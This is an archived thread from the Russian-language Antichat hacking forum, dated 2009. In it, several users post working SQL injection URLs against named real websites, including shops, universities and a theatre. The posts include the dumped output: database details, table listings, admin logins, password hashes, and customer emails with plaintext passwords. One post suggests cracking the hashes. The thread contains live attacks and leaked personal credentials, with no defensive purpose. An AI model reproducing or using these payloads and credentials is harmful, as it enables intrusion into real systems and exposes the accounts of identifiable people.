ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9301  
Старый 10.05.2009, 22:39
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Код:
http://www.videofil.net.ua/prices.php?id=-1+union+select+1,2,concat_ws(0x3a,id,login,password),4,5,6,7,8+from+users+--+
1:admin:b4d5caaf5ef14f659142515d1d7fe0a9
 
Ответить с цитированием

  #9302  
Старый 10.05.2009, 23:04
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.catsmd.com/index.php?lang=ru&lnk=pomet.php?-4+union+select+1,2,3,concat_ws(0x3a,version(),data base(),useR(),@@version_compile_os),5,6,7,8,9,10,1 1,12,13,14,15,16--


Database Version: 5.1.32
Database name: catsmdc_cats
User name: catsmdc_root@localhost
Os : portbld-freebsd7.0
 
Ответить с цитированием

  #9303  
Старый 11.05.2009, 00:08
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.academianavigatio.org {PR 2}
Код:
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
5.0.75-log : anavigatio : anavigatio@85.128.177.64

columns where table name user:
Код:
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x75736572--
id,login,haslo,imie,nazwisko,data_utworzenia,prawo

columns info where table name user:
Код:
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,concat_ws(0x3a,id,login,haslo,imie,nazwisko,data_utworzenia,prawo),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user--
1 : an : qwer1234 : ADMIN : ADMIN: 0000-00-00 : 1
 
Ответить с цитированием

  #9304  
Старый 11.05.2009, 09:01
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

http://shop.solarstone.co.uk/products.php?cat_id=-37+union+select+1,2,3,4,5,group_concat(concat_ws(0 x3a,email,passwd))+from+solarsto_shop.customers--
Код:
alexnews@clevercherry.com:clevercherry
shop@solarstone.co.uk:mow321m!
rich@solarstone.co.uk:mow321m!
lesdeguzman@hotmail.com:crittur17
sachin@natsep.co.za:oakenfold
andrea.giacomoni@tiscali.it:0be7xzja
http://baltija.eu/news_print.php?ntpl=2&print_id=-600+union+select+concat_ws(0x3a,version(),database (),user()),2,3,4,5,6,7,8--
Код:
4.1.22-standard:gjdrp_portal:gjdrp_portal@localhost

http://baltija.eu/news_print.php?ntpl=2&print_id=-600+union+select+group_concat(concat_ws(0x3a,login,pass)),2,3,4,5,6,7,8+from+users--

sergey2:qweqwe
bratello555:pass
report:qweqwe
bratello55:pass
bratello55:wertery2
http://www.abdn.ac.uk/r&i/support/print.php?id=-75+union+select+1,version(),3,4,5,6,7,8,database() ,10,11,12,user(),14--
Код:
woi001_fund@webserv2-7.abdn.ac.uk
5.0.37-community-log
woi001_fund
http://www.articlesfree.co.uk/article.php?id=-24789+union+select+1,2,3,4,user(),database(),versi on(),8,9,10,11,12,13,14,15,16,17--&act=print
Код:
ukart01_adrian@localhost
5.0.67-community
ukart01_ukart

http://www.articlesfree.co.uk/article.php?id=-24789+union+select+1,2,3,4,group_concat(concat_ws(0x3a,adminid,password)),6,7,8,9,10,11,12,13,14,15,16,17+from+dbs_admin--&act=print

admin:6ecef1648de55c0ad4e1dbc87116ea6c
 
Ответить с цитированием

  #9305  
Старый 11.05.2009, 10:05
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR: 3

http://www.classic-zone.de/modding.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user ())--

4.1.22-max-log:v128336:v128336@localhost

########################################

http://www.admintalk.de/viewtips.php?id= 1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21--

5.0.32-Debian_7etch10-log:admintalk:Jann@localhost

куча таблов , выложу кусок:

http://www.admintalk.de/viewtips.php?id=1+union+select+1,group_concat(tabl e_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+information_schema.tables+group+by+ta ble_schema+limit+2,1--

atalk_tips,atalk_programme_os,atalk_programme_imag es,pot_user_agents,pot_hostnames,pot_accesslog,ata lk_programme_subcategory,atalk_programme_language, pot_visitors,atalk_bezug_os,pot_operating_systems, pot_add_data,atalk_statistics_referrer,atalk_progr amme_licence,atalk_bezug_sprache,pot_referers,pot_ documents,atalk_system_users,atalk_progra

(смареть все таблы через лимит)

взял таблу atalk_system_users:

http://www.admintalk.de/viewtips.php?id=1+union+select+1,group_concat(conc at_ws(0x3a,name,username,email,password)),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ata lk_system_users--

shadowsnake:admin:admin@admintalk.de:5840876be50d0 30815db1a392977205e,test6:test:admin@shadowsnake.d e:098f6bcd4621d373cade4e832627b4f6,Stefan:tty1:tty 1@gmx.net:fec0d60207dd5987e630ab4f6e47ba92,Burim:s uwan:master@xuwak.net:6b9260b1e02041a665d4e4a5117c fe16,Philipp:Philipphib89@web.de:0e219cdc17c98d1 f693492dfeabcbdcd


P.S какие то хеши есть в БД http://passcrackin g.ru/inde x.php так что вперед, тока у меня не получилось коннект в админку ))

Последний раз редактировалось HAXTA4OK; 11.05.2009 в 10:09..
 
Ответить с цитированием

  #9306  
Старый 11.05.2009, 10:56
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

www.khatece.com Харьковский театральный центр

http://www.khatece.com/html/press/news/new.php?id=-28+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7
Цитата:
5.0.67-community-log::new2002_new2002@localhost::new2002_theatre
Таблички:
http://www.khatece.com/html/press/news/new.php?id=-28+union+select+1,2,group_concat(table_name),4,5,6 ,7+from+information_schema.tables+group+by+table_s chema+limit+1,1
Цитата:
smi,comments,nick_base,photografs,theatres,News,da te_indexing,number,photos,places,bill_projects,fin d_wo,partners,projects,category,guestbook,photo_bi ll
 
Ответить с цитированием

  #9307  
Старый 11.05.2009, 11:15
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

http://www.britisharticledirectory.co.uk/article.php?id=-545+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,1 3,14,15,16,17--&act=print
Код:
4.1.22-standard:britisha_ad:britisha_ad@localhost
http://www.clubgb.co.uk/darts/teams/player-stats-print.php?ID=18&ID2=43&ID3=0&ID1=-33+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versi on(),database(),user()),9,10,11,12,13,14,15,16,17--
Код:
4.1.21-standard:clubgb:axol@195.224.50.61
 
Ответить с цитированием

  #9308  
Старый 11.05.2009, 11:36
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

ТИЦ: 10
PR: 4

http://www.levgroup.am/rus/index.php?sec=photo&id=-1+union+sel ect+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7--

5.0.67-community-log:levgroup_db:levgroup_db@localhost

tables: photo,home,photo_parent,images,about,users,news,ap load_images,other,create_photo

columns-users:

id,username,password,lastname,firstname,email

admin: 1:AL31d4H7:0562a1064bd7a70ffe5e5b6934e2c627 ??

##########################################
PR: 4

http://www.parle.am/index.php? p=7&l=arm&s=3&id=-1+union+select+1, concat_ws(0x3a,version(),data base(),user()),3,4,5--

5.0.67-communityarleam_dbarleam_user@localhost

tables:catalogue,groups,category,pprice,content,pr inting,gallery,struct,ggroups

Последний раз редактировалось HAXTA4OK; 11.05.2009 в 11:51..
 
Ответить с цитированием

  #9309  
Старый 11.05.2009, 13:44
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Универ Зимбабы))
http://www.uz.ac.zw/jobs/details.php?id=-385+union+select+1,2,3,4,5,6,table_name,8+from+inf ormation_schema.tables+limit+145,1000--

work_student
userinfo_def
userinfo_content
lp_user_module_progress
group_rel_team_user
bb_users
bb_rel_topic_userstonotify
user_sessions
 
Ответить с цитированием

  #9310  
Старый 11.05.2009, 17:27
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.emsa2008.org {PR 3}
Код:
http://www.emsa2008.org/index.php?id=-1+union+all+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--
5.0.51a-24 : emsa2008 : emsa2008@localhost

Код:
http://www.emsa2008.org/index.php?id=-1+union+all+select+1,2,group_concat(login,0x3a,pass),4,5,6+from+users--
login : emsa2008
pass : cemsa2008fpm

http://www.emsa2008.org/phpmyadmin
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 11 (пользователей: 0 , гостей: 11)
 


Быстрый переход




ANTICHAT.XYZ